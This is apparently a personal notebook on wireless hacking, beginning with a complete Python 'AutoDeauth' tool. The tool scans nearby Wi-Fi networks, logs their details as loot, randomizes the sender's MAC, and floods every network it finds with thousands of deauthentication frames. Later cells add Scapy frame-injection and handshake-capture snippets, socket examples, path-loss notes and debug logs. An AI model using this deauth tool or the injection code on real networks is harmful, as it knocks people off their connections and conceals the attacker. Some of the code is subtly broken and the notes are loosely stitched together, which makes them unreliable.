        target_mac_address --  MAC address of the target device to deauth (default: ff:ff:ff:ff:ff:ff) (ALL)
        packet_count       --  Amount of deauth frames to send default: 5000
        frequency          --  Time between packets sending
        verbose            --  Scapy verbosity

        Return
        False if the file could not be saved
        """
        if self.mode != "monitor" and not self.set_mode_monitor():
            return False
        dot11 = Dot11(
            addr1=target_mac_address, addr2=bssid_address, addr3=bssid_address
        )
        frame = RadioTap() / dot11 / Dot11Deauth()
        sendp(
            frame,
            iface=self.interface,
            count=packet_count,
            inter=frequency,
            verbose=verbose,
        )
        self.set_mode_managed()
        return True

    def set_down(self) -> bool:
        """Sets the primary adapter down

        Return:
        True if the adapter was set down
        """
        if not self.did_os_command_succeed(f"sudo ifconfig {self.interface} down"):
            self.logger.error(f"Failed to set {self.interface} down")
            return False
        time.sleep(2)
        return True

    def set_up(self) -> bool:
        """Sets the primary adapter up

        Return:
        True if the adapter was set up
        """
        if not self.did_os_command_succeed(f"sudo ifconfig {self.interface} up"):
            self.logger.error(f"Failed to set {self.interface} up")
            return False
        time.sleep(2)
        return True

    def change_mac_address(self):
        if not self.set_down():
            return False
        if not self.did_os_command_succeed(f"sudo macchanger -b -r {self.interface}"):
            self.logger.error("Failed to change MAC address")
            return False
        return self.set_up()

    def restart_networking_service(self) -> bool:
        """
        Attempts to restart the networking service and the network-manager service
        """
        if not self.did_os_command_succeed(
            "sudo service networking restart"
        ) and not self.did_os_command_succeed("sudo service network-manager restart"):
            self.logger("Failed to restart services: networking, and network-manager")
            return False
        return True

    def set_mode_monitor(self) -> bool:
        """
        Sets the network interface into monitor mode
        """
        if not self.set_down():
            return False
        if not self.did_os_command_succeed(
            f"sudo iwconfig {self.interface} mode monitor"
        ):
            self.logger.error(f"Failed to set {self.interface} to monitor mode")
            return False
        if not self.set_up():
            return False
        self.monitor_mode = True
        return True

    def set_mode_managed(self) -> bool:
        """
        Sets the network interface into managed mode
        """
        if not self.set_down():
            return False
        if not self.did_os_command_succeed(
            f"sudo iwconfig {self.interface} mode managed"
        ):
            self.logger.error(f"Failed to set {self.interface} to managed")
            return False
        if self.set_up():
            return False
        self.monitor_mode = False
        return True

    def restart_network_adapter(self) -> bool:
        """
        Restart the primary network adapter
        """
        return self.set_down() and self.set_up()

    def stop(self) -> None:
        if self.mode != "managed":
            self.set_mode_managed()
        self.enabled = False


class AutoDeauth:
    def __init__(self, **kwargs) -> None:
        """AutoDeauth

        Keyword arguments:
        network_interface -- Interface to run the attack (must support packet injection)
        ssid_blacklist    -- Networks to avoid
        ssid_whitelist    -- Targets to only attack
        led               -- Enable LED Indicators (default: False)

        Return
        False if the file was not saved
        """
        self.interface = kwargs.get("interface")
        self.interface = InterfaceManager(self.interface)
        self.ssid_blacklist = kwargs.get("blacklist")
        self.ssid_whitelist = kwargs.get("whitelist")
        self.deauth_led = kwargs.get("led")
        self.time = kwargs.get("time")
        self.count = kwargs.get("count")
        self.random = kwargs.get("random")
        self.ignore = kwargs.get("ignore")
        self.verbose = kwargs.get("verbose")
        self.monitor_mode = False
        self.create_logger()
        if self.deauth_led:
            self.init_gpio_pins()
        self.blink_thread = None
        self.is_done = True

    def init_gpio_pins(self) -> None:
        """
        Sets up the selected GPIO pin
        """
        GPIO.setup(self.deauth_led, GPIO.OUT)

    def blink_led(self) -> None:
        """
        Thread that blinks the led when deauthing a network
        """
        while not self.is_done:
            GPIO.output(self.deauth_led, GPIO.HIGH)
            time.sleep(0.2)
            GPIO.output(self.deauth_led, GPIO.LOW)
            time.sleep(0.2)
        GPIO.output(self.deauth_led, GPIO.LOW)

    def create_logger(self) -> None:
        """
        Creates a logging object
        """
        self.logger = logging.getLogger("autodeauth")
        self.logger.setLevel(logging.DEBUG)
        formatter = logging.Formatter("%(asctime)s - %(message)s", "%Y-%m-%d %H:%M:%S")
        stream_handler = logging.StreamHandler(sys.stdout)
        stream_handler.setFormatter(formatter)
        file_handler = logging.FileHandler(f"{LOG_DIR}/log")
        file_handler.setFormatter(formatter)
        self.logger.addHandler(stream_handler)
        self.logger.addHandler(file_handler)

    def save_information(self, network: wifi.Cell) -> bool:
        """
        Saves the network object to a json file

        Keyword arguments:
        network -- Network object to save

        Return
        False if the file could not be saved
        """
        file_path = get_loot_file(network.ssid)
        json_obj = {
            "ssid": network.ssid,
            "mac_address": network.address,
            "channel": network.channel,
            "network.frequency": network.frequency,
            "mode": network.mode,
            "bitrates": network.bitrates,
            "encryption_type": network.encryption_type,
            "encrypted": network.encrypted,
            "quality": network.quality,
            "signal": network.signal,
        }
        if save_dict_to_json_file(file_path, json_obj):
            return True
        self.logger.error(f"Failed to save {network.ssid} to {file_path}")

    def get_filtered_networks(self) -> list:
        try:
            networks = self.interface.get_local_networks()
            filtered_networks = []
            if not networks:
                return []
            for network in networks:
                ssid = format_string(network.ssid)
                if not ssid or self.ssid_blacklist and (network.address in self.ssid_blacklist or ssid in self.ssid_blacklist):
                    continue
                elif not self.ssid_whitelist or self.ssid_whitelist and ssid in self.ssid_whitelist or self.ssid_whitelist and network.address in self.ssid_whitelist:
                    self.save_information(network)
                    filtered_networks.append(network)
            return filtered_networks
        except (KeyboardInterrupt):
            self.stop()

    def start(self) -> None:
        if not self.interface:
            self.logger.error(
                f"Failed to start {self.interface.interface} is not a valid interface!"
            )
            self.stop()
        while True:
            try:
                networks = self.get_filtered_networks()
                for network in networks:
                    self.logger.info(
                        f"Sending {self.count} deauth frames to network: {network.address} -- {network.ssid}"
                    )

                    if self.deauth_led:
                        self.is_done = False
                        self.blink_thread = threading.Thread(target=self.blink_led)
                        self.blink_thread.start()

                    if self.random:
                        if not self.interface.change_mac_address() and not self.ignore:
                            self.logger.error("Failed to change MAC address")
                            self.stop()

                    if not self.interface.deauth_network(
                        network.address,
                        packet_count=self.count,
                        frequency=self.time,
                        verbose=self.verbose,
                    ):
                        self.logger.error(
                            f"Failed to deauth {network.address} -- {network.ssid}"
                        )
                    self.is_done = True
                    if self.deauth_led and self.is_done and self.blink_thread:
                        self.blink_thread.join()
            except OSError as e: 
                self.logger.warning(f"{e} Reducing packet count to {1000}")
                self.count = 1000
            except (KeyboardInterrupt):
                self.stop()

    def stop(self) -> None:
        self.logger.info("Exiting/Cleaning up")
        if self.interface:
            self.interface.stop()
        if self.deauth_led and self.blink_thread:
            self.is_done = True
            self.blink_thread.join()
        if self.deauth_led:
            GPIO.cleanup()
        exit()


if __name__ == "__main__":
    print(
        """
        _       _       ___                _   _    
       /_\ _  _| |_ ___|   \ ___ __ _ _  _| |_| |_  
      / _ \ || |  _/ _ \ |) / -_) _` | || |  _| ' \ 
     /_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|\n"""
    )
    parser = argparse.ArgumentParser(description="Auto Deauth Tool")
    parser.add_argument(
        "--interface",
        "-i",
        help="Interface to fetch WiFi networks and send deauth packets (must support packet injection) ",
        required=True,
    )
    parser.add_argument(
        "--blacklist",
        "-b",
        help="List of networks ssids/mac addresses to avoid (Comma seperated)",
        type=lambda arg: arg.split(","),
    )
    parser.add_argument(
        "--whitelist",
        "-w",
        help="List of networks ssids/mac addresses to target (Comma seperated)",
        type=lambda arg: arg.split(","),
    )
    parser.add_argument("--led", "-l", help="Led pin number for led display", type=int)
    parser.add_argument(
        "--time",
        "-t",
        help="Time (in s) between two deauth packets (default 0)",
        default=0,
    )
    parser.add_argument(
        "--random",
        "-r",
        help="Randomize your MAC address before deauthing each network",
        default=False,
        action="store_true",
    )
    parser.add_argument(
        "--ignore",
        help="Ignore errors encountered when randomizing your MAC address",
        default=False,
        action="store_true",
    )
    parser.add_argument(
        "--count",
        "-c",
        help="Number of packets to send (default 5000)",
        type=int,
        default=5000,
    )
    parser.add_argument(
        "--verbose",
        "-v",
        help="Scapy verbosity setting (default: 0)",
        type=int,
        default=0,
    )
    args = parser.parse_args()
    data = vars(args)
    if args.led:
        try:
            GPIO.setmode(GPIO.BOARD)
        except (NameError, ImportError, RuntimeError):
            # GPIO Mode can only be ran on a raspberry pi
            # File "/usr/local/lib/python3.10/dist-packages/RPi/GPIO/__init__.py", line 23, in <module>
            #
            # from RPi._GPIO import *
            # RuntimeError: This module can only be run on a Raspberry Pi!

            exit(
                "Unable to setup LED indicator, it doesnt look like you are running using raspberry pi"
            )
    a = AutoDeauth(**data)
    try:
        a.start()
    except OSError:
        time.sleep(30)
        a.start()


## Setting up client / server ipc connections

Basically, this was solely contrived from using codeium AI, but familiarity with the technology confirms feasibility and validity of the approach.

The concept is to configure the daemon to be an IPC server, and seperately create an IPC client to connect to it, query and recieve data from the daemon.

### Sever implementation

In [ ]:
import socket

# Create a server socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the server socket to a specific address and port
server_address = ('localhost', 12345)
server_socket.bind(server_address)

# Start listening for incoming connections
server_socket.listen()

# Accept a client connection
client_socket, client_address = server_socket.accept()

# Receive data from the client
data = client_socket.recv(1024)

# Process the received data

# Send a response back to the client
response = 'Hello from the server!'
client_socket.send(response.encode())

# Close the client and server sockets
client_socket.close()
server_socket.close()

### Client implementation

In [ ]:
import socket

# Create a client socket
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the server
server_address = ('localhost', 12345)
client_socket.connect(server_address)

# Send data to the server
data = 'Hello from the client!'
client_socket.send(data.encode())

# Receive a response from the server
response = client_socket.recv(1024)

# Process the response

# Close the client socket
client_socket.close()

## Scapy Examples from popular programs (Circa 2018)

Below are examples of popular scapy functions.

### 1. Aggr-Inject

In [ ]:
def __init__(self, recv_mac, trans_mac, dst_mac):
        self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
        self.dot11hdr = Dot11(type="Data", subtype=DOT11_SUBTYPE_DATA, addr1=recv_mac, addr2=trans_mac, addr3=dst_mac, SC=0x3060, FCfield=0x01)
        self.data = self.rt / self.dot11hdr
        self.recv_mac = recv_mac
        self.trans_mac = trans_mac
        self.dst_mac = dst_mac


### 2. Aggr-Inject

In [ ]:
    def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
        self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
        self.dot11hdr = Dot11(type="Data", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw("\x80\x00")
        self.data = self.rt / self.dot11hdr
        self.num_subframes = 0
        self.recv_mac = recv_mac
        self.src_mac = src_mac
        self.dst_mac = dst_mac

### 3. Aggr-Inject

In [ ]:
    def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
        self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
        self.dot11hdr = Dot11(type="Data", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw("\x00\x00")
        self.data = self.rt
        self.num_subframes = 0
        self.recv_mac = recv_mac
        self.src_mac = src_mac
        self.dst_mac = dst_mac


### 4. Pyrit

In [ ]:
# May result in 'anonymous' AP
        self._add_ap(ap_mac, dot11_pckt)
        ap = self.air[ap_mac]

        self._add_station(ap, sta_mac)
        sta = ap[sta_mac]

        if EAPOL_WPAKey in dot11_pckt:
            wpakey_pckt = dot11_pckt[EAPOL_WPAKey]
        elif EAPOL_RSNKey in dot11_pckt:
            wpakey_pckt = dot11_pckt[EAPOL_RSNKey]
        elif dot11_pckt.isFlagSet('type', 'Data') \
         and dot11_pckt.haslayer(scapy.layers.dot11.Dot11WEP):
            # An encrypted data packet - maybe useful for CCMP-attack

            dot11_wep = str(dot11_pckt[scapy.layers.dot11.Dot11WEP])
            # Ignore packets which has less than len(header + data + signature)
            if len(dot11_wep) < 8 + 6 + 8:
                return

            # Ignore packets with high CCMP-counter. A high CCMP-counter
            # means that we missed a lot of packets since the last
            # authentication which also means a whole new authentication
            # might already have happened.
            ccmp_counter = (dot11_wep[0:2] + dot11_wep[4:8])[::-1]
            if int(binascii.hexlify(ccmp_counter), 16) < 30:
                self._add_ccmppckt(sta, pckt)
            return
        else:
            return

        # Frame 1: pairwise set, install unset, ack set, mic unset
        # results in ANonce
        if wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'ack')) \
         and wpakey_pckt.areFlagsNotSet('KeyInfo', ('install', 'mic')):
            self._add_keypckt(sta, 0, pckt)
            return

        # Frame 2: pairwise set, install unset, ack unset, mic set,
        # SNonce != 0. Results in SNonce, MIC and keymic_frame
        elif wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'mic')) \
         and wpakey_pckt.areFlagsNotSet('KeyInfo', ('install', 'ack')) \
         and not all(c == '\x00' for c in wpakey_pckt.Nonce):
            self._add_keypckt(sta, 1, pckt)
            return

        # Frame 3: pairwise set, install set, ack set, mic set
        # Results in ANonce
        elif wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'install', \
                                                 'ack', 'mic')):
            self._add_keypckt(sta, 2, pckt)
            return


### 5. Aggr-Inject

In [ ]:
def ssid_packet():
    ap_mac = '00:00:00:00:00:00'
    rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
    beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \
                 / Dot11Beacon(cap=0x2105)                                                           \
                 / Dot11Elt(ID='SSID', info="injected SSID")                                         \
                 / Dot11Elt(ID='Rates', info=AP_RATES)                                               \
                 / Dot11Elt(ID='DSset', info=chr(CHANNEL))

    # Update sequence number
    beacon_packet.SC = 0x3060

    # Update timestamp
    beacon_packet[Dot11Beacon].timestamp = time.time()

    mpdu_len = len(beacon_packet) + 4

    if mpdu_len % 4 != 0:
        padding = "\x00" * (4 - (mpdu_len % 4))  # Align to 4 octets
    else:
        padding = ""
    mpdu_len <<= 4
    crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)

    crc = crc_fun(struct.pack('<H', mpdu_len))
    maccrc = dot11crc(str(beacon_packet))
    delim_sig = 0x4E

    #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
    #hexdump(maccrc)
    ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)
    #hexdump(ampdu_header)

    data = ampdu_header / beacon_packet / maccrc / padding
    data /= "\x00\x00\x20\x4e" * 8
    data = str(data)

    return data

## Calculating distance of a wireless device

This is where I wish I had payed more attention in math class.

### Calculating Frame Margin. (or whatever FSPL is.)

`FSPL (dB) = 20log10(d) + 20log10(f) + K`

d = distance
f = frequency
K= constant that depends on the units used for d and f
If d is measured in kilometers, f in MHz, the formula is:

`FSPL (dB) = 20log10(d)+ 20log10(f) + 32.44`

Free Space Path Loss=Tx Power-Tx Cable Loss+Tx Antenna Gain+Rx Antenna Gain - Rx Cable Loss - Rx Sensitivity - Fade Margin 

FSPL = Tx Power - Tx CBLS + Tx AntGain + Rx AntGain - RxCBLS - Rx Sensitivity - Fade Margin

## Debuging Output



```shell
 █▀▀█ █▀▀█ █▀▀█ █──█ █▀▀ █──█ ─▀─ █▀▀▄ █▀▀▀  ▀▀█▀▀ ─▀─ █▀▀▀ █▀▀ █▀▀█
░█─── █▄▄▀ █──█ █──█ █── █▀▀█ ▀█▀ █──█ █─▀█  ─░█── ▀█▀ █─▀█ █▀▀ █▄▄▀
░█▄▄█ ▀─▀▀ ▀▀▀▀ ─▀▀▀ ▀▀▀ ▀──▀ ▀▀▀ ▀──▀ ▀▀▀▀  ─░█── ▀▀▀ ▀▀▀▀ ▀▀▀ ▀─▀▀
INFO: Started crouching tiger
INFO: Started logger...
INFO: Started crouching tiger
INFO: Started logger...
INFO: Beginning Mac Purge
DEBUG: args: $Namespace(name='wlan0', config_file='config_path', log_level='DEBUG', log_file='/var/log/ctiger.log', module='mac', mon_type='switch', valid_file='ct_valid.csv', channels='1,7,6,11', fun=<function Purge.mac_purge at 0x7f9166405a80>)
DEBUG: Kwargs: ${'name': 'wlan0', 'config_file': 'config_path', 'log_level': 'DEBUG', 'log_file': '/var/log/ctiger.log', 'module': 'mac', 'mon_type': 'switch', 'valid_file': 'ct_valid.csv', 'channels': '1,7,6,11', 'fun': <function Purge.mac_purge at 0x7f9166405a80>}
DEBUG: Interface: $None
DEBUG: Self Interface: $None
DEBUG: Monitor Type: $switch
DEBUG: Kwargs: ${'interface': 'wlan0', 'mon_type': 'switch', 'valid_file': 'ct_valid.csv', 'channels': '1,7,6,11'}
DEBUG: Interface: $wlan0
DEBUG: Self Interface: $wlan0
DEBUG: Monitor Type: $switch
DEBUG: Kwargs: ${}
DEBUG: Interface: $None
DEBUG: Self Interface: $None
DEBUG: Monitor Type: $None
DEBUG: Monitor Type:
DEBUG: mac_address: $3d:1d:06:fd:9b:e1
DEBUG: Monitor Type: $None
INFO: Starting monitor interface
DEBUG: Invalid monitor type
```

## Custom Scapy Sessions

One can configure their own scapy session, 

In [ ]:
# SPDX-License-Identifier: GPL-2.0-only
# This file is part of Scapy
# See https://scapy.net/ for more information

"""
Sessions: decode flow of packets when sniffing
"""

from collections import defaultdict
import socket
import struct

from scapy.compat import orb
from scapy.config import conf
from scapy.packet import NoPayload, Packet
from scapy.pton_ntop import inet_pton

# Typing imports
from typing import (
    Any,
    DefaultDict,
    Dict,
    Iterator,
    List,
    Optional,
    Tuple,
    cast,
    TYPE_CHECKING,
)
from scapy.compat import Self
if TYPE_CHECKING:
    from scapy.supersocket import SuperSocket


# You will only need to extend the Default Session
class DefaultSession(object):
    """Default session: no stream decoding"""

    def __init__(self, supersession: Optional[Self] = None):
        if supersession and not isinstance(supersession, DefaultSession):
            supersession = supersession()
        self.supersession = supersession

    def process(self, pkt: Packet) -> Optional[Packet]:
        """
        Called to pre-process the packet
        """
        # Optionally handle supersession
        if self.supersession:
            return self.supersession.process(pkt)
        return pkt

    def recv(self, sock: 'SuperSocket') -> Iterator[Packet]:
        """
        Will be called by sniff() to ask for a packet
        """
        pkt = sock.recv()
        if not pkt:
            return
        pkt = self.process(pkt)
        if pkt:
            yield pkt
            
            
class Dot11Session(DefaultSession):
    """Decode Dot11 packets 'on-the-flow'.

    Usage:
    >>> sniff(session=Dot11Session)
    """

    def __init__(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        DefaultSession.__init__(self, *args, **kwargs)
        self.keys = {}  # type: Dict[Tuple[Any, ...], List[Packet]]  # noqa: E501


class IPSession(DefaultSession):
    """Defragment IP packets 'on-the-flow'.

    Usage:
    >>> sniff(session=IPSession)
    """

    def __init__(self, *args, **kwargs):
        # type: (*Any, **Any) -> None
        DefaultSession.__init__(self, *args, **kwargs)
        self.fragments = defaultdict(list)  # type: DefaultDict[Tuple[Any, ...], List[Packet]]  # noqa: E501

    def process(self, packet: Packet) -> Optional[Packet]:
        from scapy.layers.inet import IP, _defrag_ip_pkt
        if IP not in packet:
            return packet
        return _defrag_ip_pkt(packet, self.fragments)[1]  # type: ignore
